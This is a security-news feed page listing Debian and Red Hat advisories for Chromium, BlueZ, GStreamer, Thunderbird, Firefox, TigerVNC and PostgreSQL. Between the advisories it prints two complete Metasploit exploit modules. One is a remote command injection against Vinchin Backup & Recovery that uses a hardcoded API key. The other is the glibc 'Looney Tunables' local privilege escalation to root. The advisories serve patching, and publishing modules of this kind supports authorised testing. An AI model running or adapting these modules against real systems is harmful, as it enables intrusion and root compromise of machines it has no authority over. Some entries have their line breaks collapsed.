Debian Linux Security Advisory 5585-1 - An important security issue was discovered in Chromium, which could result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5585-1                   security@debian.org  
https://www.debian.org/security/                           Andres Salomon  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-7024

An important security issue was discovered in Chromium, which could result  
in the execution of arbitrary code.

Google is aware that an exploit for CVE-2023-7024 exists in the wild.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 120.0.6099.129-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 120.0.6099.129-1~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmWEtBwACgkQZF0CR8Nu  
djcwTRAAlSOMympmaRnt7wtj/PasL1BjxHxalhGYU5KxKugz8BmDZN2j+ulLg2c9  
SoJQCIT3RhUyNbWyZV3WKXjSBkn3kE4G/lplL9AIDTHAfy4yrqUo41ews7DMfPQ4  
oNVJhIqIGl+VTaX1zaH50hXJI2Ax294Uo986iGplWScYqnlkcWLNX5RWOtYQLrR7  
BjYzEFIoDouuF5w+7nXyy3nDJYeaBotz1eifayEVYul0k55ljGftzkW5EVrS8zVF  
MeSz0YrXNpqlV6SREVg6jouZxJdNUE1+X72j+dK9rAwR4gcZekcd1JOO+oFfRv86  
jwb3ui8oB3ZJ8K0EPswWK7trq/rFra2T50YvP4wpbwtQ5RG99z612cCgeHZYuLLY  
WW3qWK20lKWbhCwP2S7KXuNFZpVu2ddvj+y4MqMS16HlQyobvQR8obUpwtK1YZSe  
Ak88vaCUk/3ZrFSSggxQQIgSBKtWTLcL7wons5RELGrrowmGZPS+ajpsWtAvGlhJ  
S+QZWkpKlW2F92cl1md7R5zN5vAeVQqW6w20eDebbk4HLgGv6wqgEVNyRcQXUKh/  
3GqGvbuPAoo+gVqGybr+Efmb/xnZn2Y7/AbmjatjA3Iq2Z+NJNUBVahXeZ1s4b5U  
SuvktcJ0szrqOPYNNBkx35/5rSy6nb1KoStG4lvX8XMMese5Ty8=xniE  
-----END PGP SIGNATURE-----

Debian Security Advisory 5585-1

Debian Linux Security Advisory 5584-1 - It was reported that the BlueZ's HID profile implementation is not inline with the HID specification which mandates the use of Security Mode 4. The HID profile configuration option ClassicBondedOnly now defaults to "true" to make sure that input connections only come from bonded device connections.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5584-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : bluez  
CVE ID         : CVE-2023-45866  
Debian Bug     : 1057914

It was reported that the BlueZ's HID profile implementation is not  
inline with the HID specification which mandates the use of Security  
Mode 4.  The HID profile configuration option ClassicBondedOnly now  
defaults to "true" to make sure that input connections only come from  
bonded device connections.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 5.55-3.1+deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 5.66-1+deb12u1.

We recommend that you upgrade your bluez packages.

For the detailed security status of bluez please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/bluez

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWElXhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qbdw/+Ly8+kB39iFkiQiFluySzb1mPvYHz0RBYx5aa8iLhWU6SuuZwFGv1ZNTf  
r16whtZOmBGYPDjJrRbksd01rNxIlwW8jaNPCOiDySYqrw3Ni0cbWRYrtNSjzOYJ  
cwoPg+4OYEiY+0HkAuTaAfctD5Nyf6sIN2dMsy3VERxZAlRFMUElAVn2obhRoW3P  
VtQHfVsedGcVsmxHS72MnXIEBYhFu9Q+lA80qfteiPBnQUFo41DeV1ar1uGBhDWG  
qwkl+8+etRYhnLMnX361Hd+5eVAC8IIQQaFR+5lfq7VydIcDcV2gpENOxNj4G3T1  
TSJ+ts6BX9BSuPVXFckymid71bbUJ+1r/IpvA8nlc+UIDTPmpZygijohMkjOpuNH  
kwkPVuRNmOAH6/umh7auZn5donXaPA8k303EUvaMNpGxfmD3jxdLsDwrrE/qRtGv  
kPCV67y0N6ZaN1d8wxuIcQ4aiQVAgNlmi9hhAfYhhhdt3y/oGcqMT2iUPQIla3Wj  
sWRUYt8mTcZdG2g00WBj+DTh0EuUwd9ILYPfSK+zWf+ikQ1+LrQvfVEMD1ejWmIg  
QI6vxwN9wiim9PydlAbtlsQ4vb/246MPuWbXcRS3omW3CvK86i0GpSVvpjrr2DmB  
pQ4rYr6bFcVINzLr79lz5GMGIpuShCllrtLkXofyfhinvNthKZs=DXXJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5584-1

Debian Linux Security Advisory 5583-1 - A buffer overflow was discovered in the AV1 video plugin for the GStreamer media framework, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5583-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gst-plugins-bad1.0  
CVE ID         : not yet available

A buffer overflow was discovered in the AV1 video plugin for the  
GStreamer media framework, which may result in denial of service or  
potentially the execution of arbitrary code if a malformed media file  
is opened.

The oldstable distribution (bullseye) is not affected.

For the stable distribution (bookworm), this problem has been fixed in  
version 1.22.0-4+deb12u4.

We recommend that you upgrade your gst-plugins-bad1.0 packages.

For the detailed security status of gst-plugins-bad1.0 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gst-plugins-bad1.0

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWEkCMACgkQEMKTtsN8  
TjZOGQ/+P4p0HpeYQLjyb0UwvQ8XuLMd0BHI9AeBXAAvm2apCwIALqqTeMZ86YId  
XE/QiVqFccIMJ4GiyQyiSZLcS9py9RDLzw/y3pefi8n1gZdfLBJEvJtlYsPV0FD2  
/a71aMG2hHqK2ez45mvsLJmGbanBaslC6cbJ5+/Y8psWBDq28VYEp3Zb5HnuHy2U  
7lZIpZ1cQeChaE7ef+Qbnep6c8Lxyjf4fyBj2K5PqgsFuxqwCzzkPQDDA6A5AAUI  
DsdA27iTthBAOKjFJvh3TPuEdnFtMZghsYo0YU8OoJl47/gJhx36gFFivyudWYKN  
IHxOVbyNsmAphUDfwUyJUxKKbcFgx59AvTNSD2v2N7ulehYIN3GWjRgLtm30HX45  
fPMhzoVQJHTBLmqtUviKc9pJPPV4bctt82p5iuCQ8DZHHImtYsJQbbBzzpjtv9DA  
zXRp/XyJoZwCLuIvwvcc0kYMo0E7CkGFHWfMJvVFmAkokc4N1bw3F/PEolhrlXwE  
Kx25Zif6HlX2QR7ReADL/fe9JdJqGYjLkq9KXHteg4VLpBx6cB+6Wcie76ONeA5C  
MWzancxEwMN2gSXymwB7gAtA3dKA2Dct34Gm0rdnRVR2Iafy4YyaIVbszUvHX5XB  
LHTHg0UNz7plbefH3kPBVCCz/G/AwHeK0DNusO8HNIwQAVZyV60m0j  
-----END PGP SIGNATURE-----

Debian Security Advisory 5583-1

Debian Linux Security Advisory 5582-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service, the execution of arbitrary code or spoofing of signed PGP/MIME and SMIME emails.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5582-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 21, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2023-6856 CVE-2023-6857 CVE-2023-6858 CVE-2023-6859                 CVE-2023-6860 CVE-2023-6861 CVE-2023-6862 CVE-2023-6864                 CVE-2023-6873 CVE-2023-50761 CVE-2023-50762Multiple security issues were discovered in Thunderbird, which couldresult in denial of service, the execution of arbitrary code or spoofingof signed PGP/MIME and SMIME emails.For the oldstable distribution (bullseye), these problems have been fixedin version 1:115.6.0-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 1:115.6.0-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWEkCEACgkQEMKTtsN8TjYB8xAAiSFGWOK6s+7YGuc28bu4EEUHG2sUXJ9g43AD9DftxhVlz1fh2GbyXxpLDyoq3rrZU3n8bVQTWLcfRcdLYOZlMNEaxN8K89lGRfh+864anLQIGGII3gsCC8qS3Wx96W9Ydh4++iM55Yopc9SNAFKUKXONYU8dxolSYsDAwkhw4iU97TjURsImOTzmnpyAIvVbG7Uf3HEnyb98KRr8OgbzdkJpg/JFKj5NLxX8QJ1kKpV9/8uYKRxdehNhljlYXt2j5fqaL1jXXcOMkEuMgXjUl5Hq2dh6owEPkfHDRMMLLypsuCXDz+i4mAyYQGgrdNYshf876OT4cmf2O3d/lXExWdcALWGRd3/tLSB7KIoRUtit/+OZT6/jVvSjr4g4vfQvQHC7JlvUmrglmKrHQ3J4b0TEeMN3GIrUadMFSVG2C8pfS23e91AtF6Jyeg00ZvP8/voUiHWymJTgJesDxHsHK1ZRMqulaIHwNuS+DieOW2mqNmb/exuJ4v35XwIFCrMBzmOkxDrfdiSLciXA2+qcdKW7QM+hK2hEzZBaw31OHgHTPZwzd2sMx9UDrKaejR/xKIMRgscqQcdISdsQTCmbFO98/iyiUXUF+j+itvdqrnaAn8ZEMtPj1dm54YzDuuZrWDrQ/IYxUz66x7NzQFAZKJc41toPY3u5aIx+lXOQZyAÛG4-----END PGP SIGNATURE-----

Debian Security Advisory 5582-1

This Metasploit module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Vinchin Backup and Recovery Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in Vinchin Backup & Recovery          v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the          checkIpExists API endpoint, an attacker can execute arbitrary commands as the          web server user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gregory Boddin (LeakIX)', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'References' => [          ['CVE', '2023-45498'],          ['CVE', '2023-45499'],          ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],          ['URL', 'https://vinchin.com/'] # Vendor URL        ],        'DisclosureDate' => '2023-10-26',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ],          'AKA' => ['Vinchin Command Injection']        },        'Platform' => ['linux', 'unix'],        'Arch' => [ARCH_CMD],        'Targets' => [          ['Automatic', {}]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'        },        'Privileged' => false      )    )    register_options(      [        Opt::RPORT(443),        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),      ]    )  end  def exploit    hex_encoded_payload = payload.encoded.unpack('H*').first    formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join    temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"    command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),      'vars_get' => {        'm' => '30',        'f' => 'checkIpExists',        'k' => datastore['APIKEY']      },      'data' => "p={\"ip\":\"a||#{command}\"}"    })  end  def check    target_uri_path = normalize_uri(target_uri.path, 'login.php')    res = send_request_cgi('uri' => target_uri_path)    return CheckCode::Unknown('Failed to connect to the target.') unless res    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200    version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/    version_match = res.body.match(version_pattern)    unless version_match && version_match[1]      return CheckCode::Unknown('Unable to extract version.')    end    version = Rex::Version.new(version_match[1])    print_status("Detected Vinchin version: #{version}")    if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||       (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||       (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||       (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))      return CheckCode::Appears    else      return CheckCode::Safe    end  endend

Vinchin Backup And Recovery Command Injection

A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. It has been dubbed Looney Tunables. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when launching binaries with SUID permission to execute code in the context of the root user. This Metasploit module targets glibc packaged on Ubuntu and Debian. Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911 however this module does not target them.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  # includes: is_root?  include Msf::Post::Linux::Priv  # includes: kernel_release  include Msf::Post::Linux::Kernel  # include: get_sysinfo  include Msf::Post::Linux::System  # includes writable?, upload_file, upload_and_chmodx, exploit_data, cd  include Msf::Post::File  # includes register_files_for_cleanup  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  BUILD_IDS = {    '69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,    '3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,    'a99db3715218b641780b04323e4ae5953d68a927' => 561,    'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,    '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,    '9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,    'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,    '956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322  }  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',        'Description' => %q{          A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES          environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when          launching binaries with SUID permission to execute code in the context of the root user.          This module targets glibc packaged on Ubuntu and Debian. The specific glibc versions this module targets are:          Ubuntu:          2.35-0ubuntu3.4 > 2.35          2.37-0ubuntu2.1 > 2.37          2.38-1ubuntu6 > 2.38          Debian:          2.31-13-deb11u7 > 2.31          2.36-9-deb12u3 > 2.36          Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911          however this module does not target them.        },        'Author' => [          'Qualys Threat Research Unit', # discovery          'blasty <peter@haxx.in>', # PoC          'jheysel-r7' # msf module        ],        'References' => [          ['CVE', '2023-4911'],          ['URL', 'https://haxx.in/files/gnu-acme.py'],          ['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],          ['URL', 'https://ubuntu.com/security/CVE-2023-4911']        ],        'License' => MSF_LICENSE,        'Platform' => [ 'linux', 'unix' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'DefaultTarget' => 0,        'DefaultOptions' => {          'PrependSetresgid' => true,          'PrependSetresuid' => true,          'WfsDelay' => 600        },        'DisclosureDate' => '2023-10-03',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_advanced_options([      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])    ])  end  def find_exec_program    %w[python python3].select(&method(:command_exists?)).first  rescue StandardError => e    fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")  end  def check    glibc_version = cmd_exec('ldd --version')&.scan(/ldd\s+$\w+\s+GLIBC\s+(\S+)$/)&.flatten&.first    return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version    sysinfo = get_sysinfo    case sysinfo[:distro]    when 'ubuntu'      # Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility      test_version = glibc_version.gsub(/-\d+ubuntu/, '.')      if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")      end    when 'debian'      # Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility      test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')      if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")      end    else      return CheckCode::Unknown('The module has not been tested against this Linux distribution')    end    CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")  end  def check_ld_so_build_id    # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so    if !command_exists?('file')      print_warning('Unable to locate the `file` command ti  order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')      return    end    file_cmd_output = ''    # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not    # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.    sysinfo = get_sysinfo    case sysinfo[:distro]    when 'ubuntu'      if command_exists?('ldconfig')        file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')      end    when 'debian'      file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')    else      fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')    end    if file_cmd_output =~ /BuildID\[.+\]=(\w+),/      build_id = Regexp.last_match(1)      if BUILD_IDS.keys.include?(build_id)        print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")      else        fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")      end    else      print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')    end  end  def exploit    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?    python_binary = find_exec_program    fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary    vprint_status("Using '#{python_binary}' to run the exploit")    check_ld_so_build_id    # The python script assumes the working directory is the one we can write to.    cd(datastore['WritableDir'])    shell_code = payload.encoded.unpack('H*').first    exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py')    exploit_data = exploit_data.gsub('METASPLOIT_SHELL_CODE', shell_code)    exploit_data = exploit_data.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))    # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully    output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")    if output.blank?      print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')    else      print_line(output)    end  endend

Glibc Tunables Privilege Escalation

Debian Linux Security Advisory 5581-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, sandbox escape or clickjacking.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5581-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 20, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-6856 CVE-2023-6857 CVE-2023-6858 CVE-2023-6859                  CVE-2023-6860 CVE-2023-6861 CVE-2023-6862 CVE-2023-6863                  CVE-2023-6864 CVE-2023-6865 CVE-2023-6867Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, sandbox escape or clickjacking.For the oldstable distribution (bullseye), these problems have been fixedin version 115.6.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.6.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWDPxAACgkQEMKTtsN8TjYfeRAAql+aZ6PpAM1Fq4Cp1IlvDQc8BYNuKrjn9/4xYgq/bAnQyRGj1I0viHP2dUdZl6CcndqE6NVgm1mYpCQ/TZJpwSSxnoXf46bB/lGNg17Cw7T8gWI5uUSs1K63UOYNMr8HlCF35qZpU0+TrsL+q3qRdkOQOxRLSFHNhxuUQ+44pUJYKDVg6vKjHU91oQEfjzmcgn2Z+tL/zyrt4s57XUGpZNm6Vmg/TUftXL5+CDodCNPRnIw0JBYWu2yfJ3tj6cuCw6jDAcAouAsDcd8CbK28Bf6h2zUossRGVjSfNWeoshK2qe9L3/wlQB62s0wrJ1MimP9k1y9xS4Iy85vf2BDDnVQBNgMR8mKnwt63Jhngpx8JW8oTbBKzx1oiEZkShw3CDWuCx7ooMnR8glwybPJqXMyZbt8H7dMO3IFEwD2dfNzVfwyEUq4JAOzCPasLEwCekXrTTxeZoYdTW4y8c5c4GEd9nvO8Hdk9iV/zbD1uhpgy0g6oQXciAzSH6Rm92u2+HPwNOFjZAJMOi9eyqtdj9PqwHZ1uraXhtqCz8peD/Sg+YZCAXt0lLyVM+WbQqJOyH5n1POeEHbEikv1iMLXRw+Vkkbzr3u9laTdQ9Yn1b/ZfVblG6/N+hhlLLXYBXyYfrU4L6DMTnUave299Cq1fb8RPWVefcqAv6DoQX0P1GHc==8/zE-----END PGP SIGNATURE-----

Debian Security Advisory 5581-1

Red Hat Security Advisory 2023-7886-03 - An update for tigervnc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7886.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tigervnc security updateAdvisory ID:        RHSA-2023:7886-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7886Issue date:         2023-12-20Revision:           03CVE Names:          CVE-2023-6377====================================================================Summary: An update for tigervnc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377)* xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6377References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2253291https://bugzilla.redhat.com/show_bug.cgi?id=2253298

Red Hat Security Advisory 2023-7886-03

Red Hat Security Advisory 2023-7885-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7885.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:15 security update  
Advisory ID:        RHSA-2023:7885-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7885  
Issue date:         2023-12-20  
Revision:           03  
CVE Names:          CVE-2023-5868  
====================================================================

Summary: 

An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

* postgresql: MERGE fails to enforce UPDATE or SELECT row security policies (CVE-2023-39418)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5868

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2228112  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7885-03

Red Hat Security Advisory 2023-7884-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 8. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7884.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:15 security update  
Advisory ID:        RHSA-2023:7884-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7884  
Issue date:         2023-12-20  
Revision:           03  
CVE Names:          CVE-2023-5868  
====================================================================

Summary: 

An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

